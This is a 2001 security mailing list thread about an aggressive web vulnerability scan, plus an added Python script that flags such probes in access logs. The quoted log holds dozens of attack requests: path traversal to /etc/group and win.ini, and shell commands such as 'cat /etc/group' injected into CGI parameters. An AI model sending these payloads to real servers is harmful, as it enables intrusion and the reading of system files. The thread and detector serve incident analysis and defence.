Security Incidents mailing list archives
Re: Very thorough scan of web apps-
From: J Jewitt <jjewitt2001 () yahoo com>
Date: Wed, 15 Aug 2001 07:48:30 -0700 (PDT)
Appears to be by SAINT, web site is www.wwdsi.com.

--- jamie rishaw <jamie () arpa com> wrote:
Hardcore scan of our web server.. Does this look familiar to anyone?

[ LOG :: ]
69warp87.newtel.com - - [14/Aug/2001:12:56:16 -0400] "QUIT" 501 -
69warp87.newtel.com - - [14/Aug/2001:13:06:18 -0400] "QUIT" 401 -
69warp87.newtel.com - - [14/Aug/2001:13:07:35 -0400] "GET /n0nexi5tent_fi1e.html HTTP/1.0" 401 468
69warp87.newtel.com - - [14/Aug/2001:13:07:35 -0400] "GET /n0nexi5tent_fi1e.html HTTP/1.0" 401 468
69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] "GET / HTTP/1.0" 401 468
69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] "GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/group HTTP/1.0" 400 371
69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] "GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini HTTP/1.0" 400 375
69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] "GET /../../../../../etc/group HTTP/1.0" 400 351
69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] "GET /../../../../../winnt/win.ini HTTP/1.0" 400 355
69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] "GET /../../../../..winnt/win.ini HTTP/1.0" 400 354
69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] "GET /.../.../.../.../.../etc/group HTTP/1.0" 401 468
69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] "GET /.../.../.../.../.../winnt/win.ini HTTP/1.0" 401 468
69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] "GET /../../../../../etc/group HTTP/1.0" 400 351
69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] "GET /../../../../../winnt/win.ini HTTP/1.0" 400 355
69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] "GET /cgi-bin/webdist.cgi?distloc=;/bin/cat%20/etc/group HTTP/1.0" 404 284
69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] "GET /cgi-bin/campas?%0acat%0a/etc/group%0a HTTP/1.0" 404 279
69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] "GET /cgi-bin/htmlscript?../../../../../../etc/group HTTP/1.0" 404 283
69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] "GET /cgi-bin/php.cgi?/etc/group HTTP/1.0" 404 280
69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] "GET /cgi-bin/pfdispaly?../../../../../../etc/group HTTP/1.0" 404 282
69warp87.newtel.com - - [14/Aug/2001:13:07:40 -0400] "GET /cgi-bin/pfdispaly.cgi?../../../../../../etc/group HTTP/1.0" 404 286
69warp87.newtel.com - - [14/Aug/2001:13:07:40 -0400] "GET /cgi-bin/view-source?../../../../../../etc/group HTTP/1.0" 404 284
69warp87.newtel.com - - [14/Aug/2001:13:07:40 -0400] "GET /cgi-bin/htsearch?exclude=%60/etc/group%60 HTTP/1.0" 404 281
69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/cat%20/etc/group HTTP/1.0" 404 285
69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] "GET /cgi-bin/faxsurvey?/bin/cat%20/etc/group HTTP/1.0" 404 282
69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] "GET /cgi-bin/counterfiglet/nc/f=;cat%20/etc/group HTTP/1.0" 404 307
69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] "GET /cgi-bin/calendar_admin.pl?config=|cat%20/etc/group| HTTP/1.0" 404 290
69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] "GET /cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/group| HTTP/1.0" 404 299
69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/group%00 HTTP/1.0" 404 300
69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] "GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/group HTTP/1.0" 404 286
69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] "GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/group HTTP/1.0" 404 284
69warp87.newtel.com - - [14/Aug/2001:13:07:43 -0400] "GET /cgi-bin/htgrep?file=index.html&hdr=/etc/group HTTP/1.0" 404 279
69warp87.newtel.com - - [14/Aug/2001:13:07:43 -0400] "GET /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/group%00 HTTP/1.0" 404 280
69warp87.newtel.com - - [14/Aug/2001:13:07:43 -0400] "GET /search97cgi/vtopic?action=view&ViewTemplate=../../../../../etc/group HTTP/1.0" 401 468
69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] "GET /cgi-bin/multihtml.pl?multi=/etc/group%00html HTTP/1.0" 404 285
69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] "GET /cgi-bin/query?mss=../config HTTP/1.0" 404 278
69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] "GET /cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group HTTP/1.0" 400 377
69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] "GET /cgi-bin/webplus?script=/../../../../etc/group HTTP/1.0" 404 280
69warp87.newtel.com - - [14/Aug/2001:13:07:45 -0400] "GET /cgi-bin/webplus.exe?script=/../../../../etc/group HTTP/1.0" 404 284
69warp87.newtel.com - - [14/Aug/2001:13:07:45 -0400] "GET /cgi-bin/webplus.cgi?script=/../../../../etc/group HTTP/1.0" 404 284
69warp87.newtel.com - - [14/Aug/2001:13:07:45 -0400] "GET /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20Content-Type:%20text%2Fhtml%3Becho%20%20%3B%20cat%20%2Fetc%2Fgroup%00 HTTP/1.0" 404 284
69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] "GET /cgi-bin/bbs_forum.cgi?read=../../../../etc/group HTTP/1.0" 404 286
69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] "GET /cgi-bin/bbs/bbs_forum.cgi?read=../../../../etc/group HTTP/1.0" 404 290
69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] "GET /cgi-bin/man-cgi?%20/etc/group%20 HTTP/1.0" 404 280
69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] "GET /opendir.php?requesturl=/etc/group HTTP/1.0" 401 468
69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] "GET /bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL2dyb3VwAAo HTTP/1.0" 401 468
69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] "GET /cgi-bin/talkback.cgi?article=../../../../../etc/group%00&action=view&matchview=1 HTTP/1.0" 404 285
69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] "GET /cgi-bin/cal_make.pl?p0=../../../../../etc/group%00 HTTP/1.0" 404 284
69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] "GET /cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/group HTTP/1.0" 404 292
69warp87.newtel.com - - [14/Aug/2001:13:07:48 -0400] "GET /cgi-bin/test-cgi HTTP/1.0" 403 285
69warp87.newtel.com - - [14/Aug/2001:13:07:48 -0400] "GET /cgi-bin/dumpenv.pl HTTP/1.0" 404 283
69warp87.newtel.com - - [14/Aug/2001:13:07:48 -0400] "GET /cgi-bin/nph-test-cgi HTTP/1.0" 404 285
69warp87.newtel.com - - [14/Aug/2001:13:07:49 -0400] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 284
69warp87.newtel.com - - [14/Aug/2001:13:07:52 -0400] "GET /cgi-bin/wwwboard.cgi HTTP/1.0" 404 285
69warp87.newtel.com - - [14/Aug/2001:13:07:52 -0400] "GET /cgi-bin/wwwboard HTTP/1.0" 404 281
69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] "GET /cgi-bin/wrap HTTP/1.0" 404 277
69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] "GET /cgi-bin/wrap.pl HTTP/1.0" 404 280
69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] "GET /cgi-bin/wrap.cgi HTTP/1.0" 404 281
69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] "GET /cgi-bin/finger HTTP/1.0" 404 279
69warp87.newtel.com - - [14/Aug/2001:13:07:54 -0400] "GET /cgi-bin/finger.pl HTTP/1.0" 404 282
69warp87.newtel.com - - [14/Aug/2001:13:07:54 -0400] "GET /cgi-bin/finger.cgi HTTP/1.0" 404 283
69warp87.newtel.com - - [14/Aug/2001:13:07:54 -0400] "GET
=== message truncated ===
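
Added example, not part of the original messages: a small Python triage pass over Common Log Format lines like those quoted above. It percent-decodes each request, counts the indicator classes visible in that log and reports hosts that trip several of them or request several nonexistent /cgi-bin/ paths. The indicator patterns, the min_hits threshold and the client.example.net line are assumptions made for this example; the other sample lines are copied from the quoted log.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+$')
# Indicator classes seen in the quoted log (assumed patterns), matched after decoding.
INDICATORS = {
    "traversal": re.compile(r"\.\.+/"),                      # ../ and .../
    "probe_file": re.compile(r"/etc/group|winnt/win\.ini", re.I),
    "shell_meta": re.compile(r"\?.*[;|`\n]", re.S),          # metachar in query
    "nul_byte": re.compile(r"\x00"),                         # %00 truncation
}

def classify(request):
    """Return the indicator names matched by one logged request string."""
    parts = request.split(" ")
    target = unquote(parts[1]) if len(parts) >= 2 else request
    return {name for name, rx in INDICATORS.items() if rx.search(target)}

def summarize(lines, min_hits=3):
    """Per-host totals; keep hosts with >= min_hits indicators or missing CGIs."""
    hosts = {}
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue  # wrapped or damaged line: skip rather than guess
        host, request, status = m.groups()
        h = hosts.setdefault(host, {"requests": 0, "indicators": defaultdict(int), "missing_cgi": set()})
        h["requests"] += 1
        for name in classify(request):
            h["indicators"][name] += 1
        path = request.split(" ")[1].split("?")[0] if " " in request else ""
        if status == "404" and path.startswith("/cgi-bin/"):
            h["missing_cgi"].add(path)
    return {k: v for k, v in hosts.items()
            if sum(v["indicators"].values()) >= min_hits or len(v["missing_cgi"]) >= min_hits}

# Sample input: five lines from the quoted log plus one constructed benign line.
SAMPLE = [
    '69warp87.newtel.com - - [14/Aug/2001:12:56:16 -0400] "QUIT" 501 -',
    '69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] "GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/group HTTP/1.0" 400 371',
    '69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] "GET /cgi-bin/campas?%0acat%0a/etc/group%0a HTTP/1.0" 404 279',
    '69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] "GET /cgi-bin/php.cgi?/etc/group HTTP/1.0" 404 280',
    '69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] "GET /cgi-bin/multihtml.pl?multi=/etc/group%00html HTTP/1.0" 404 285',
    'client.example.net - - [14/Aug/2001:13:08:01 -0400] "GET /index.html HTTP/1.0" 200 1043',  # constructed
]
if __name__ == "__main__":
    print(summarize(SAMPLE))
```

Matching on decoded requests rather than raw strings is what lets the %2E%2E and %00 variants fall into the same buckets as their literal forms.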
Current thread:
- Very thorough scan of web apps- jamie rishaw (Aug 14)
- Re: Very thorough scan of web apps- Hugo van der Kooij (Aug 14)
- Re: Very thorough scan of web apps- J Jewitt (Aug 15)
